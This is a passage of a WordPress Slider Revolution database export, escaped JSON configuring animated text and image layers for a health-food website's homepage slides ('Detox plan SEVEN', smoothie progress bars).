9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"SWEET & HEALTY FOOD\",\"alias\":\"[qodef_section_title ...\",\"uid\":4,\"size\":{\"width\":{\"d\":{\"v\":\"729px\",\"e\":true},\"n\":{\"v\":\"188px\",\"e\":true},\"t\":{\"v\":\"200px\",\"e\":true},\"m\":{\"v\":\"199px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"25px\",\"e\":true}},\"originalWidth\":\"729px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-358px\",\"e\":true},\"n\":{\"v\":\"-370px\",\"e\":true},\"t\":{\"v\":\"-133px\",\"e\":true},\"m\":{\"v\":\"-54px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-100px\",\"e\":true},\"n\":{\"v\":\"-148px\",\"e\":true},\"t\":{\"v\":\"-178px\",\"e\":true},\"m\":{\"v\":\"-42px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"2px\",\"e\":true},\"t\":{\"v\":\"2px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"[vc_column][qodef_progress_bar title_tag=\\\"\\\" percent=\\\"38\\\" title=\\\"Aloe Shots\\\"][qodef_progress_bar title_tag=\\\"\\\" percent=\\\"53\\\" title=\\\"Smoothies\\\"][qodef_progress_bar title_tag=\\\"\\\" percent=\\\"67\\\" title=\\\"Veggie Wraps\\\"]\",\"alias\":\"Progres bar\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"v\":\"624px\",\"e\":true},\"n\":{\"v\":\"505px\",\"e\":true},\"t\":{\"v\":\"466px\",\"e\":true},\"m\":{\"v\":\"310px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"121px\",\"e\":true},\"t\":{\"v\":\"138px\",\"e\":true},\"m\":{\"v\":\"200px\",\"e\":true}},\"originalWidth\":\"624px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-408px\",\"e\":true},\"n\":{\"v\":\"-209px\",\"e\":true},\"t\":{\"v\":\"151px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"175px\",\"e\":true},\"n\":{\"v\":\"71px\",\"e\":true},\"t\":{\"v\":\"447px\",\"e\":true},\"m\":{\"v\":\"120px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Detox plan SEVEN\",\"alias\":\"Detox plan SEVEN\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"514px\",\"e\":true},\"n\":{\"v\":\"317px\",\"e\":true},\"t\":{\"v\":\"317px\",\"e\":true},\"m\":{\"v\":\"324px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"23px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"89px\",\"e\":true}},\"scaleProportional\":true,\"originalWidth\":\"514px\",\"originalHeight\":\"23px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-468px\",\"e\":true},\"n\":{\"v\":\"-306px\",\"e\":true},\"t\":{\"v\":\"-76px\",\"e\":true},\"m\":{\"v\":\"7px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-61px\",\"e\":true},\"n\":{\"v\":\"-109px\",\"e\":true},\"t\":{\"v\":\"-141px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"36px\",\"e\":true},\"n\":{\"v\":\"36px\",\"e\":true},\"t\":{\"v\":\"36px\",\"e\":true},\"m\":{\"v\":\"36px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(22,8,5,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide5-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"power3.out\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"22\":{\"text\":\"Image 8\",\"alias\":\"Image 8\",\"uid\":22,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/home-10.png\",\"imageId\":3778},\"size\":{\"width\":{\"d\":{\"v\":\"481px\",\"e\":true},\"n\":{\"v\":\"461px\",\"e\":true},\"t\":{\"v\":\"484px\",\"e\":true},\"m\":{\"v\":\"484px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"298px\",\"e\":true},\"n\":{\"v\":\"285px\",\"e\":true},\"t\":{\"v\":\"299px\",\"e\":true},\"m\":{\"v\":\"299px\",\"e\":true}},\"originalWidth\":665,\"originalHeight\":412,\"aspectRatio\":{\"d\":{\"v\":1.6140776699029127},\"n\":{\"v\":1.6140776699029127},\"t\":{\"v\":1.6140776699029127},\"m\":{\"v\":1.6140776699029127}}},\"position\":{\"x\":{\"d\":{\"v\":\"546px\",\"e\":true},\"n\":{\"v\":\"301px\",\"e\":true},\"t\":{\"v\":\"6px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"249px\",\"e\":true},\"n\":{\"v\":\"144px\",\"e\":true},\"t\":{\"v\":\"239px\",\"e\":true},\"m\":{\"v\":\"133px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\